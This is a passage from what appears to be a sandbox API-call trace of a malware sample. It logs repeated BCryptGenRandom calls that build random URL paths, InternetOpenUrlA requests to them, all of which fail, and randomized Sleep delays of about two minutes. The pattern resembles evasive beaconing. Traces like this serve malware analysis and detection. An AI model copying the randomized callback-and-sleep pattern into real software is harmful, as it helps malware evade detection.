0x7ffc5bcc36b0 [0227.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.386] GetProcessHeap () returned 0x440000 [0227.386] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0227.386] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0227.387] lstrcatA (in: lpString1="\x04", lpString2="/ard6bXsogMerl8Qg44/Qkgojdnhrfj77gl7qqzTmrFe589WqiiQ/yptT3mLyn29tOWzijydpiD/pkgn5pSv4m8aRb8BggjCquSr/" | out: lpString1="\x04/ard6bXsogMerl8Qg44/Qkgojdnhrfj77gl7qqzTmrFe589WqiiQ/yptT3mLyn29tOWzijydpiD/pkgn5pSv4m8aRb8BggjCquSr/") returned="\x04/ard6bXsogMerl8Qg44/Qkgojdnhrfj77gl7qqzTmrFe589WqiiQ/yptT3mLyn29tOWzijydpiD/pkgn5pSv4m8aRb8BggjCquSr/" [0227.387] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0227.387] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ard6bXsogMerl8Qg44/Qkgojdnhrfj77gl7qqzTmrFe589WqiiQ/yptT3mLyn29tOWzijydpiD/pkgn5pSv4m8aRb8BggjCquSr/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0227.387] GetProcessHeap () returned 0x440000 [0227.387] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0227.387] GetProcessHeap () returned 0x440000 [0227.387] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0227.387] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0227.387] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0227.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0227.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0227.388] Sleep (dwMilliseconds=0x16b6b) [0227.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0227.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.659] GetProcessHeap () returned 0x440000 [0227.659] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54b0 [0227.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0227.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54b1, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x4f54b1) returned 0x0 [0227.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0227.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0227.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0227.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.482] GetProcessHeap () returned 0x440000 [0228.482] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0228.483] lstrcpyA (in: lpString1=0x472900, lpString2="°TO" | out: lpString1="°TO") returned="°TO" [0228.483] lstrcatA (in: lpString1="°TO", lpString2="/0oashwFumtS3cbsuf/" | out: lpString1="°TO/0oashwFumtS3cbsuf/") returned="°TO/0oashwFumtS3cbsuf/" [0228.483] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0228.483] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="°TO/0oashwFumtS3cbsuf/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0228.483] GetProcessHeap () returned 0x440000 [0228.483] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0228.483] GetProcessHeap () returned 0x440000 [0228.483] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54b0 | out: hHeap=0x440000) returned 1 [0228.483] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0228.484] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0228.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0228.484] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0228.484] Sleep (dwMilliseconds=0x1d484) [0228.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0228.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0228.862] GetProcessHeap () returned 0x440000 [0228.862] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e30 [0228.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0228.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e31, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4f4e31) returned 0x0 [0228.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0228.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0228.870] GetProcessHeap () returned 0x440000 [0228.870] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0228.870] lstrcpyA (in: lpString1=0x472900, lpString2="0NO" | out: lpString1="0NO") returned="0NO" [0228.871] lstrcatA (in: lpString1="0NO", lpString2="/k4reez13JmrVay3y3uee2879/" | out: lpString1="0NO/k4reez13JmrVay3y3uee2879/") returned="0NO/k4reez13JmrVay3y3uee2879/" [0228.871] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0228.871] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="0NO/k4reez13JmrVay3y3uee2879/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0228.871] GetProcessHeap () returned 0x440000 [0228.871] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0228.871] GetProcessHeap () returned 0x440000 [0228.871] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e30 | out: hHeap=0x440000) returned 1 [0228.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0228.872] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0228.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0228.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0228.872] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0228.872] Sleep (dwMilliseconds=0x17e6f) [0229.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0229.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.102] GetProcessHeap () returned 0x440000 [0229.102] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02050 [0229.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02051, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a02051) returned 0x0 [0229.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0206f, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a0206f) returned 0x0 [0229.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.108] BCryptGenRandom (in: hAlgorithm=0x0, 